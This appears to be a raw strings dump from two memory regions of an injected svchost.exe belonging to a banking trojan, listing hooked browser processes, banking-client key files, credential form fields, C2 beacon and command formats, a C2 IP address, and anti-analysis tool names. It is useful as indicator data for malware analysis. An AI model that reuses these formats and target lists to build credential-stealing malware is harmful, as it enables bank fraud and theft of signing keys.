Winmm.dll
Kernel32.dll
Kernel32.dll
Gdi32.dll
Gdi32.dll
hXXp://
hXXp://
hXXps://
hXXps://
HTTP/1.
HTTP/1.
nspr4.dll
nspr4.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
[[[URL: %s
[[[URL: %s
Process: %s
Process: %s
User-agent: %s]]]
User-agent: %s]]]
{{{%s
{{{%s
Crypt32.dll
Crypt32.dll
CertVerifyCertificateChainPolicy
CertVerifyCertificateChainPolicy
Wininet.dll
Wininet.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
set_url
set_url
microsoft.public.win32.programmer.kernel
microsoft.public.win32.programmer.kernel
\iexplore.exe
\iexplore.exe
keygrab
keygrab
u.bmp
u.bmp
\\.\PhysicalDrive%u
\\.\PhysicalDrive%u
/topic.php
/topic.php
keylog.txt
keylog.txt
passwords.txt
passwords.txt
%s%u.zip
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.bing.com
VVV.microsoft.com
VVV.microsoft.com
frd.exe
frd.exe
command=config&update_url=
command=config&update_url=
/search.php
/search.php
&port=
&port=
command=load&url=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\chrome.exe
\svchost.exe
\svchost.exe
\java.exe
\java.exe
\javaw.exe
\javaw.exe
\javaws.exe
\javaws.exe
\opera.exe
\opera.exe
\firefox.exe
\firefox.exe
\maxthon.exe
\maxthon.exe
\avant.exe
\avant.exe
\mnp.exe
\mnp.exe
\safari.exe
\safari.exe
\netscape.exe
\netscape.exe
\tbb-firefox.exe
\tbb-firefox.exe
\frd.exe
\frd.exe
\isclient.exe
\isclient.exe
\ipc_full.exe
\ipc_full.exe
\intpro.exe
\intpro.exe
\cbsmain.dll
\cbsmain.dll
\clmain.exe
\clmain.exe
\core.exe
\core.exe
\rundll32.exe
\rundll32.exe
\notepad.exe
\notepad.exe
\cbank.exe
\cbank.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
%s.dbf
%s.dbf
%s.DBF
%s.DBF
j_password=
j_password=
pass.log
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edClientLogin=
edUserLogin=
edUserLogin=
edPassword=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
&LOGIN_AUTHORIZATION_CODE=
login=
login=
password=
password=
pass_
pass_
advapi32.dll
advapi32.dll
path.txt
path.txt
keys.zip
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
%s\d.bmp
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
keys
private.txt
private.txt
public.txt
public.txt
\*.key
\*.key
\self.cer
\self.cer
self.cer
self.cer
self.pub
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.exe
ctunnel.zip
ctunnel.zip
path_ctunnel.txt
path_ctunnel.txt
header.key
header.key
keys99
keys99
\header.key
\header.key
masks2.key
masks2.key
\masks2.key
\masks2.key
masks.key
masks.key
\masks.key
\masks.key
\name.key
\name.key
primary2.key
primary2.key
\primary2.key
\primary2.key
primary.key
primary.key
\primary.key
\primary.key
keys99.zip
keys99.zip
path99.txt
path99.txt
bsi.dll
bsi.dll
&domain=letitbit.net&
&domain=letitbit.net&
cc.txt
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
prv_key.pfx
keys\
keys\
sign.cer
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
sks2xyz.dll
vb_pfx_import
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
secret.key
pubkeys.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
path1.txt
inter.zip
inter.zip
interpro.ini
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
cbsmain.dll
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
FilialRCon.dll
ISClient.cfg
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
rfk.zip
client.zip
client.zip
path_client.txt
path_client.txt
path_keys.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
Agava_Client.exe
KeysDiskPath
KeysDiskPath
Agava_Client.ini
Agava_Client.ini
Agava_keys
Agava_keys
keys_path.txt
keys_path.txt
mespro.dll
mespro.dll
AddPSEPrivateKeyEx
AddPSEPrivateKeyEx
core.exe
core.exe
data\id.dbf
data\id.dbf
\data\id.dbf
\data\id.dbf
keys%i.zip
keys%i.zip
path%i.txt
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
winmm.dll
%s\%s
%s\%s
LibVNCServer 0.9.7
LibVNCServer 0.9.7
%s (%s)
%s (%s)
d/d/d d:d
d/d/d d:d
password check failed!
password check failed!
WinSCard.dll
WinSCard.dll
SensApi.dll
SensApi.dll
GetTcpTable
GetTcpTable
IPHLPAPI.DLL
IPHLPAPI.DLL
dbghelp.dll
dbghelp.dll
MSVCRT.dll
MSVCRT.dll
PSAPI.DLL
PSAPI.DLL
NETAPI32.dll
NETAPI32.dll
DNSAPI.dll
DNSAPI.dll
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
ShellExecuteA
ShellExecuteA
SHFileOperationA
SHFileOperationA
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryA
GetProcessHeap
GetProcessHeap
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
MapVirtualKeyW
MapVirtualKeyW
SetKeyboardState
SetKeyboardState
EnumChildWindows
EnumChildWindows
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegEnumKeyExA
RegEnumKeyExA
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegDeleteKeyA
RegDeleteKeyA
ADVAPI32.dll
ADVAPI32.dll
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
MSCTF.Shared.MAPPING.%x
MSCTF.Shared.MAPPING.%x
Desk_%u%x
Desk_%u%x
MSCTF.Shared.MUTEX.%x
MSCTF.Shared.MUTEX.%x
.Prev
.Prev
.current
.current
SYSTEM!XP1!F9BE9A8A
SYSTEM!XP1!F9BE9A8A
MSCTF.Shared.MAPPING.fffffe00
MSCTF.Shared.MAPPING.fffffe00
MSCTF.Shared.MAPPING.ffffff00
MSCTF.Shared.MAPPING.ffffff00
MSCTF.Shared.MAPPING.fffffd00
MSCTF.Shared.MAPPING.fffffd00
MSCTF.Shared.MUTEX.fffffe00
MSCTF.Shared.MUTEX.fffffe00
MSCTF.Shared.MUTEX.ffffff00
MSCTF.Shared.MUTEX.ffffff00
%Documents and Settings%\NetworkService\Application Data\
%Documents and Settings%\NetworkService\Application Data\
1-191j1w1}1
1-191j1w1}1
?"?(?-?~?
?"?(?-?~?
;-;5;=;^;|;
;-;5;=;^;|;
7"7)7\7~7
7"7)7\7~7
6 6$6(6,6064686
6 6$6(6,6064686
mavast.com
mavast.com
ya.ru
ya.ru
serverkey.dat
serverkey.dat
\windows\
\windows\
svchost.exe_1144_rwx_00820000_0005B000:
.text
.text
`.data
`.data
.reloc
.reloc
`.rdata
`.rdata
@.data
@.data
http
http
PSShL
PSShL
SSShp
SSShp
tUSSSh
tUSSSh
SSShp;
SSShp;
SSSh0
SSSh0
SSShpk
SSShpk
SSShpF
SSShpF
t9SSSh
t9SSSh
u1SSShP
u1SSShP
name.key
name.key
\secrets.key
\secrets.key
sign.key
sign.key
kernel32.dll
kernel32.dll
\explorer.exe
\explorer.exe
user32.dll
user32.dll
multi_pot.exe
multi_pot.exe
HookExplorer.exe
HookExplorer.exe
proc_analyzer.exe
proc_analyzer.exe
sckTool.exe
sckTool.exe
sniff_hit.exe
sniff_hit.exe
sysAnalyzer.exe
sysAnalyzer.exe
idag.exe
idag.exe
ollydbg.exe
ollydbg.exe
dumpcap.exe
dumpcap.exe
wireshark.exe
wireshark.exe
C:\iDEFENSE
C:\iDEFENSE
\\.\NPF_NdisWanIp
\\.\NPF_NdisWanIp
avp.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
software\microsoft\windows\currentversion\run
\winlogon.exe
\winlogon.exe
sysinfo.log
sysinfo.log
scr.bmp
scr.bmp
minidump.bin
minidump.bin
%d.%d.%d.%d
%d.%d.%d.%d
à %dh %dm
à %dh %dm
%s:%d
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
Software\Microsoft\Internet Explorer\TypedURLs
url%i
url%i
4.4.10
4.4.10
%dx%d@%d
%dx%d@%d
%c%d:d
%c%d:d
{Windows directory:
{Windows directory:
links.log
links.log
\History.IE5\index.dat
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
\Opera\Opera\typed_history.xml
avast.com
avast.com
93.191.13.100
93.191.13.100
drweb
drweb
eset.com
eset.com
z-oleg.com
z-oleg.com
kltest.org.ru
kltest.org.ru
.comodo.com
.comodo.com
google.com
google.com
Dnsapi.dll
Dnsapi.dll
ws2_32.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
/login.php
ntdll.dll
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
Global\HighMemoryEvent_x
explorer.exe
explorer.exe
1.2.5
1.2.5
- zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
- zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
Winmm.dll
Winmm.dll
Kernel32.dll
Kernel32.dll
Gdi32.dll
Gdi32.dll
hXXp://
hXXp://
hXXps://
hXXps://
HTTP/1.
HTTP/1.
nspr4.dll
nspr4.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
[[[URL: %s
[[[URL: %s
Process: %s
Process: %s
User-agent: %s]]]
User-agent: %s]]]
{{{%s
{{{%s
Crypt32.dll
Crypt32.dll
CertVerifyCertificateChainPolicy
CertVerifyCertificateChainPolicy
Wininet.dll
Wininet.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
set_url
set_url
microsoft.public.win32.programmer.kernel
microsoft.public.win32.programmer.kernel
\iexplore.exe
\iexplore.exe
keygrab
keygrab
u.bmp
u.bmp
\\.\PhysicalDrive%u
\\.\PhysicalDrive%u
/topic.php
/topic.php
keylog.txt
keylog.txt
passwords.txt
passwords.txt
%s%u.zip
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.bing.com
VVV.microsoft.com
VVV.microsoft.com
frd.exe
frd.exe
command=config&update_url=
command=config&update_url=
/search.php
/search.php
&port=
&port=
command=load&url=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\chrome.exe
\svchost.exe
\svchost.exe
\java.exe
\java.exe
\javaw.exe
\javaw.exe
\javaws.exe
\javaws.exe
\opera.exe
\opera.exe
\firefox.exe
\firefox.exe
\maxthon.exe
\maxthon.exe
\avant.exe
\avant.exe
\mnp.exe
\mnp.exe
\safari.exe
\safari.exe
\netscape.exe
\netscape.exe
\tbb-firefox.exe
\tbb-firefox.exe
\frd.exe
\frd.exe
\isclient.exe
\isclient.exe
\ipc_full.exe
\ipc_full.exe
\intpro.exe
\intpro.exe
\cbsmain.dll
\cbsmain.dll
\clmain.exe
\clmain.exe
\core.exe
\core.exe
\rundll32.exe
\rundll32.exe
\notepad.exe
\notepad.exe
\cbank.exe
\cbank.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
%s.dbf
%s.dbf
%s.DBF
%s.DBF
j_password=
j_password=
pass.log
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edClientLogin=
edUserLogin=
edUserLogin=
edPassword=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
&LOGIN_AUTHORIZATION_CODE=
login=
login=
password=
password=
pass_
pass_
advapi32.dll
advapi32.dll
path.txt
path.txt
keys.zip
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
%s\d.bmp
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
keys
private.txt
private.txt
public.txt
public.txt
\*.key
\*.key
\self.cer
\self.cer
self.cer
self.cer
self.pub
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.exe
ctunnel.zip
ctunnel.zip
path_ctunnel.txt
path_ctunnel.txt
header.key
header.key
keys99
keys99
\header.key
\header.key
masks2.key
masks2.key
\masks2.key
\masks2.key
masks.key
masks.key
\masks.key
\masks.key
\name.key
\name.key
primary2.key
primary2.key
\primary2.key
\primary2.key
primary.key
primary.key
\primary.key
\primary.key
keys99.zip
keys99.zip
path99.txt
path99.txt
bsi.dll
bsi.dll
&domain=letitbit.net&
&domain=letitbit.net&
cc.txt
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
prv_key.pfx
keys\
keys\
sign.cer
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
sks2xyz.dll
vb_pfx_import
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
secret.key
pubkeys.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
path1.txt
inter.zip
inter.zip
interpro.ini
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
cbsmain.dll
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
FilialRCon.dll
ISClient.cfg
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
rfk.zip
client.zip
client.zip
path_client.txt
path_client.txt
path_keys.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
Agava_Client.exe
KeysDiskPath
KeysDiskPath
Agava_Client.ini
Agava_Client.ini
Agava_keys
Agava_keys
keys_path.txt
keys_path.txt
mespro.dll
mespro.dll
AddPSEPrivateKeyEx
AddPSEPrivateKeyEx
core.exe
core.exe
data\id.dbf
data\id.dbf
\data\id.dbf
\data\id.dbf
keys%i.zip
keys%i.zip
path%i.txt
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
winmm.dll
%s\%s
%s\%s
LibVNCServer 0.9.7
LibVNCServer 0.9.7
%s (%s)
%s (%s)
d/d/d d:d
d/d/d d:d
password check failed!
password check failed!
WinSCard.dll
WinSCard.dll
SensApi.dll
SensApi.dll
GetTcpTable
GetTcpTable
IPHLPAPI.DLL
IPHLPAPI.DLL
dbghelp.dll
dbghelp.dll
MSVCRT.dll
MSVCRT.dll
PSAPI.DLL
PSAPI.DLL
NETAPI32.dll
NETAPI32.dll
DNSAPI.dll
DNSAPI.dll
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
ShellExecuteA
ShellExecuteA
SHFileOperationA
SHFileOperationA
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryA
GetProcessHeap
GetProcessHeap
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
MapVirtualKeyW
MapVirtualKeyW
SetKeyboardState
SetKeyboardState
EnumChildWindows
EnumChildWindows
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegEnumKeyExA
RegEnumKeyExA
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegDeleteKeyA
RegDeleteKeyA
ADVAPI32.dll
ADVAPI32.dll
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
MSCTF.Shared.MAPPING.%x
MSCTF.Shared.MAPPING.%x
Desk_%u%x
Desk_%u%x
MSCTF.Shared.MUTEX.%x
MSCTF.Shared.MUTEX.%x
.Prev
.Prev
.current
.current
1-191j1w1}1
1-191j1w1}1
?"?(?-?~?
?"?(?-?~?
;-;5;=;^;|;
;-;5;=;^;|;
7"7)7\7~7
7"7)7\7~7
6 6$6(6,6064686
6 6$6(6,6064686
mavast.com
mavast.com
ya.ru
ya.ru
serverkey.dat
serverkey.dat
\windows\
\windows\
svchost.exe_1144_rwx_008C0000_0006A000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
http
http
PSShL
PSShL
SSShp
SSShp
tUSSSh
tUSSSh
SSShp;
SSShp;
SSSh0
SSSh0
SSShpk
SSShpk
SSShpF
SSShpF
t9SSSh
t9SSSh
u1SSShP
u1SSShP
name.key
name.key
\secrets.key
\secrets.key
sign.key
sign.key
kernel32.dll
kernel32.dll
\explorer.exe
\explorer.exe
user32.dll
user32.dll
multi_pot.exe
multi_pot.exe
HookExplorer.exe
HookExplorer.exe
proc_analyzer.exe
proc_analyzer.exe
sckTool.exe
sckTool.exe
sniff_hit.exe
sniff_hit.exe
sysAnalyzer.exe
sysAnalyzer.exe
idag.exe
idag.exe
ollydbg.exe
ollydbg.exe
dumpcap.exe
dumpcap.exe
wireshark.exe
wireshark.exe
C:\iDEFENSE
C:\iDEFENSE
\\.\NPF_NdisWanIp
\\.\NPF_NdisWanIp
avp.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
software\microsoft\windows\currentversion\run
\winlogon.exe
\winlogon.exe
sysinfo.log
sysinfo.log
scr.bmp
scr.bmp
minidump.bin
minidump.bin
%d.%d.%d.%d
%d.%d.%d.%d
à %dh %dm
à %dh %dm
%s:%d
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
Software\Microsoft\Internet Explorer\TypedURLs
url%i
url%i
4.4.10
4.4.10
%dx%d@%d
%dx%d@%d
%c%d:d
%c%d:d
{Windows directory:
{Windows directory:
links.log
links.log
\History.IE5\index.dat
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
\Opera\Opera\typed_history.xml
avast.com
avast.com
93.191.13.100
93.191.13.100
drweb
drweb
eset.com
eset.com
z-oleg.com
z-oleg.com
kltest.org.ru
kltest.org.ru
.comodo.com
.comodo.com
google.com
google.com
Dnsapi.dll
Dnsapi.dll
ws2_32.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
/login.php
ntdll.dll
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
